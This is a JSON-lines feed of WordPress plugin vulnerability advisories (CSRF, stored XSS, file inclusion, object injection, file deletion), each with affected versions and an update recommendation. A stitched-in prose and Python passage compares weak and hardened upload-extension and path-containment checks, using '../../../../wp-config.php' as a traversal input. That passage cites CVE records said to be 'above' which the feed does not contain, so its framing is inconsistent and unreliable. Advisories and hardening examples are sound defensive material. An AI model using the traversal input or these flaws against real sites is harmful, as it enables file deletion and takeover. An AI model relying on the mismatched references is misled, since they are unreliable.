{"CVE_ID":"CVE-2024-12206","slug":"pearl-header-builder","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.8. This is due to missing or incorrect nonce validation on the stm_header_builder page. This makes it possible for unauthenticated attackers to delete arbitrary headers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218670%40pearl-header-builder&new=3218670%40pearl-header-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218670%40pearl-header-builder&new=3218670%40pearl-header-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4de0d05f-2f51-4fea-9520-ff07a882d95e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4de0d05f-2f51-4fea-9520-ff07a882d95e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5237","slug":"memberlite-shortcodes","versionEndExcluding":"1.3.9","description":"The Memberlite Shortcodes WordPress plugin before 1.3.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5237-memberlite-shortcodes-stored-xss-via-shortcode\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5237-memberlite-shortcodes-stored-xss-via-shortcode\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a46d686c-6234-4aa8-a656-00a65c55d0b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a46d686c-6234-4aa8-a656-00a65c55d0b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5028","slug":"cm-on-demand-search-and-replace","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The CM WordPress Search And Replace Plugin WordPress plugin before 1.3.9 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bae8494-7b01-4203-a4f7-ccc60efbdda7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bae8494-7b01-4203-a4f7-ccc60efbdda7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13443","slug":"easypromos","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Easypromos Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Easypromos shortcode in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easypromos\\\/tags\\\/1.3.8\\\/includes\\\/functions.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easypromos\\\/tags\\\/1.3.8\\\/includes\\\/functions.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81998d01-8ae7-44ac-a22e-7bdbebee6c49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81998d01-8ae7-44ac-a22e-7bdbebee6c49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5177","slug":"hash-elements","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Hash Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' parameter within multiple widgets in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ba07137-f834-4f56-bcd5-0f6fde756681?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ba07137-f834-4f56-bcd5-0f6fde756681?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-elements\\\/trunk\\\/modules\\\/news-module-one\\\/widgets\\\/news-module-one.php#L720\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-elements\\\/trunk\\\/modules\\\/news-module-one\\\/widgets\\\/news-module-one.php#L720\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090981%40hash-elements%2Ftrunk&old=3089165%40hash-elements%2Ftrunk&sfp_email=&sfph_mail=#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090981%40hash-elements%2Ftrunk&old=3089165%40hash-elements%2Ftrunk&sfp_email=&sfph_mail=#file18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5349","slug":"lastudio-element-kit","versionImpact":"1.3.8.1","versionEndExcluding":"1.3.9","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.8.1 via the 'map_style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e29a67b-2b67-4cd5-a5ae-a931900c75cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e29a67b-2b67-4cd5-a5ae-a931900c75cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108501\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/addons\\\/google-maps.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108501\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/addons\\\/google-maps.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0511","slug":"royal-elementor-addons","versionImpact":"1.3.87","versionEndExcluding":"1.3.88","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8bef03-51e0-4448-bddd-85300104e875?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8bef03-51e0-4448-bddd-85300104e875?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0856","slug":"appointment-booking-calendar","versionImpact":"1.3.82","versionEndExcluding":"1.3.83","description":"The Appointment Booking Calendar WordPress plugin before 1.3.83 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying.","recommendation":"Update to version 1.3.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb383600-0cff-4f24-8127-1fb118f0565a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb383600-0cff-4f24-8127-1fb118f0565a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5922","slug":"royal-elementor-addons","versionImpact":"1.3.80","versionEndExcluding":"1.3.81","description":"The Royal Elementor Addons and Templates WordPress plugin before 1.3.81 does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts\/pages content","recommendation":"Update to version 1.3.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/debd8498-5770-4270-9ee1-1503e675ef34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/debd8498-5770-4270-9ee1-1503e675ef34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2485","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.7","versionEndExcluding":"1.3.8.8","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8.7 via deserialization of untrusted input from the 'dnd_upload_cf7_upload' function. This makes it possible for attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with the file upload action. The Flamingo plugin must be installed and activated in order to exploit the vulnerability.","recommendation":"Update to version 1.3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L844\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L844\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ffe548-0005-4f5e-873f-a1afec64a251?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ffe548-0005-4f5e-873f-a1afec64a251?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2328","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.7","versionEndExcluding":"1.3.8.8","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'dnd_remove_uploaded_files' function in all versions up to, and including, 1.3.8.7. This makes it possible for unauthenticated attackers to add arbitrary file paths (such as ..\/..\/..\/..\/wp-config.php) to uploaded files on the server, which can easily lead to remote code execution when an Administrator deletes the message. Exploiting this vulnerability requires the Flamingo plugin to be installed and activated.","recommendation":"Update to version 1.3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6cca7a-b8ff-4ca5-b813-e611eac07695?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6cca7a-b8ff-4ca5-b813-e611eac07695?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12267","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.5","versionEndExcluding":"1.3.8.6","description":"The Drag and Drop Multiple File Upload \u2013 Contact Form 7 plugin for WordPress is vulnerable to limited arbitrary file deletion due to insufficient file path validation in the dnd_codedropz_upload_delete() function in all versions up to, and including, 1.3.8.5. This makes it possible for unauthenticated attackers to delete limited arbitrary files on the server. It is not possible to delete files like wp-config.php that would make RCE possible.","recommendation":"Update to version 1.3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231973\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231973\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec7251-3be1-411a-b38e-1782d1691e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec7251-3be1-411a-b38e-1782d1691e18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
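The records above for the Royal Elementor Addons and Drag and Drop Multiple File Upload plugins describe two recurring upload-handler defects: file-type checks that a deny-list gets wrong (.svgz in CVE-2024-1567, .phar in CVE-2025-3515) and file paths that are not confined to the uploads directory (../../../../wp-config.php in CVE-2025-2328, the wpcf7_guest_user_id cookie in CVE-2025-8464). The following is an added example, not code from any of those plugins or from Security Ninja, showing the weak check beside the hardened one for each defect. The allow-list, the directory layout (built with tempfile) and the file names are constructed for the example.

```python
"""Added example; not code from any plugin in the feed or from Security Ninja.

Two checks a form-upload handler needs: extension validation that a
deny-list gets wrong (.svgz, .phar) and path containment for deletion
(../../../../wp-config.php). The uploads layout is constructed with
tempfile so the example runs offline; the allow-list is an assumption.
"""
import os
import tempfile
from typing import List, Optional

# A deny-list as a plugin might ship it. It is incomplete by construction:
# .phar is executed as PHP by common Apache+mod_php setups and .svgz is a
# gzip-compressed SVG that browsers render with scripts; neither is listed.
DENY_LIST = {"php", "php3", "php4", "php5", "phtml", "exe", "sh"}

# Allow-list of what this hypothetical form expects to receive.
ALLOW_LIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "docx"}


def extensions(filename: str) -> List[str]:
    """Every dot-separated suffix of the basename, lowercased and in order:
    'shell.php.jpg' -> ['php', 'jpg']. Trailing dots and spaces are dropped
    first because Windows filesystems drop them too ('shell.php.' -> ['php'])."""
    base = os.path.basename(filename).rstrip(". ")
    return [p for p in base.lower().split(".")[1:] if p]


def denylist_allows(filename: str) -> bool:
    """The weak check: only the final extension is compared to the deny-list."""
    exts = extensions(filename)
    return not exts or exts[-1] not in DENY_LIST


def allowlist_allows(filename: str) -> bool:
    """The hardened check: there must be an extension and every suffix
    segment must be on the allow-list, so .phar, .svgz, .PHP and
    'shell.php.jpg' are all rejected. Legitimate multi-part names such as
    'archive.tar.gz' need both 'tar' and 'gz' listed."""
    exts = extensions(filename)
    return bool(exts) and all(e in ALLOW_LIST for e in exts)


def naive_inside(base_dir: str, user_path: str) -> bool:
    """A containment check that looks right and is not: string prefix
    matching accepts a sibling directory whose name starts with base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    return target.startswith(base)


def resolve_inside(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path against base_dir and return the absolute path only
    if it lies strictly inside base_dir after '..' and symlink resolution.
    An absolute user_path makes os.path.join discard base_dir, and realpath
    then places it outside, so it is rejected as well."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares whole path components, not characters, so
    # '<root>/uploads-old/x' is not treated as a child of '<root>/uploads'.
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def demo_layout() -> str:
    """Constructed directory tree: <root>/uploads/sub, <root>/uploads-old and
    a stand-in <root>/wp-config.php. Returns the uploads directory."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    os.makedirs(os.path.join(root, "uploads", "sub"))
    os.makedirs(os.path.join(root, "uploads-old"))
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php // constructed stand-in, not a real config\n")
    return os.path.join(root, "uploads")


if __name__ == "__main__":
    uploads = demo_layout()
    for name in ("photo.JPG", "shell.phar", "image.svgz", "shell.php.jpg", "shell.php."):
        print(f"{name:14} deny-list: {denylist_allows(name)!s:5} allow-list: {allowlist_allows(name)}")
    for rel in ("sub/../file.txt", "../../../../wp-config.php", "../uploads-old/x"):
        print(f"{rel:28} naive: {naive_inside(uploads, rel)!s:5} contained: {resolve_inside(uploads, rel)}")
```

The deletion side is the one that matters for CVE-2025-2328: a stored path is only safe to unlink after it has been re-resolved against the uploads directory at deletion time, not when it was stored, because the attacker controls what was stored.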
{"CVE_ID":"CVE-2024-13716","slug":"fx-calculators","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The Forex Calculators plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_settings_callback() function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fx-calculators\\\/tags\\\/1.3.5\\\/forex-calculators.php#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fx-calculators\\\/tags\\\/1.3.5\\\/forex-calculators.php#L101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ce8ca1-c1ae-4dda-909e-70c3b6d2b561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ce8ca1-c1ae-4dda-909e-70c3b6d2b561?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12272","slug":"wte-elementor-widgets","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The WP Travel Engine \u2013 Elementor Widgets | Create Travel Booking Website Using WordPress and Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.7 via several widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212458%40wte-elementor-widgets&new=3212458%40wte-elementor-widgets&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212458%40wte-elementor-widgets&new=3212458%40wte-elementor-widgets&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5142f6-36da-4715-91d2-7d6665c0efa6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5142f6-36da-4715-91d2-7d6665c0efa6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5468","slug":"pearl-header-builder","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to unauthorized site option deletion due to a missing validation and capability checks on the stm_hb_delete() function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to delete arbitrary options that can be used to perform a denial of service attack on a site.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e770e0-1a39-4946-838b-4fd1f1dea1c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e770e0-1a39-4946-838b-4fd1f1dea1c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pearl-header-builder\\\/tags\\\/1.3.7\\\/includes\\\/helpers.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pearl-header-builder\\\/tags\\\/1.3.7\\\/includes\\\/helpers.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9704","slug":"dvk-social-sharing","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The Social Sharing (by Danny) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dvk_social_sharing' shortcode in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167056%40dvk-social-sharing&new=3167056%40dvk-social-sharing&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167056%40dvk-social-sharing&new=3167056%40dvk-social-sharing&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1773","slug":"pdf-invoices-and-packing-slips-for-woocommerce","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The PDF Invoices and Packing Slips For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.7 via deserialization of untrusted input via the order_id parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoices-and-packing-slips-for-woocommerce\\\/trunk\\\/includes\\\/class-apifw-front-end.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoices-and-packing-slips-for-woocommerce\\\/trunk\\\/includes\\\/class-apifw-front-end.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042740\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042740\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5360","slug":"royal-elementor-addons","versionImpact":"1.3.78","versionEndExcluding":"1.3.79","description":"The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.","recommendation":"Update to version 1.3.79, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/281518ff-7816-4007-b712-63aed7828b34\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/281518ff-7816-4007-b712-63aed7828b34\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3717","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.7.7","versionEndExcluding":"1.3.7.8","description":"The Drag and Drop Multiple File Upload \u2013 Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.7.7 via the '\/wp-content\/uploads\/wp_dndcf7_uploads\/wpcf7-files' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via this plugin through a form.","recommendation":"Update to version 1.3.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/153cb585-4eea-4959-85b1-2487be11f116?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/153cb585-4eea-4959-85b1-2487be11f116?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077555%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3061101%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077555%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3061101%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3005","slug":"lastudio-element-kit","versionImpact":"1.3.7.5","versionEndExcluding":"1.3.7.6","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's LaStudioKit Post Author widget in all versions up to, and including, 1.3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544db0d5-1760-4229-8429-d2391e328304?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544db0d5-1760-4229-8429-d2391e328304?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079793\\\/lastudio-element-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079793\\\/lastudio-element-kit\",\"refsource\":\"\",\"tags\":[]}]"}
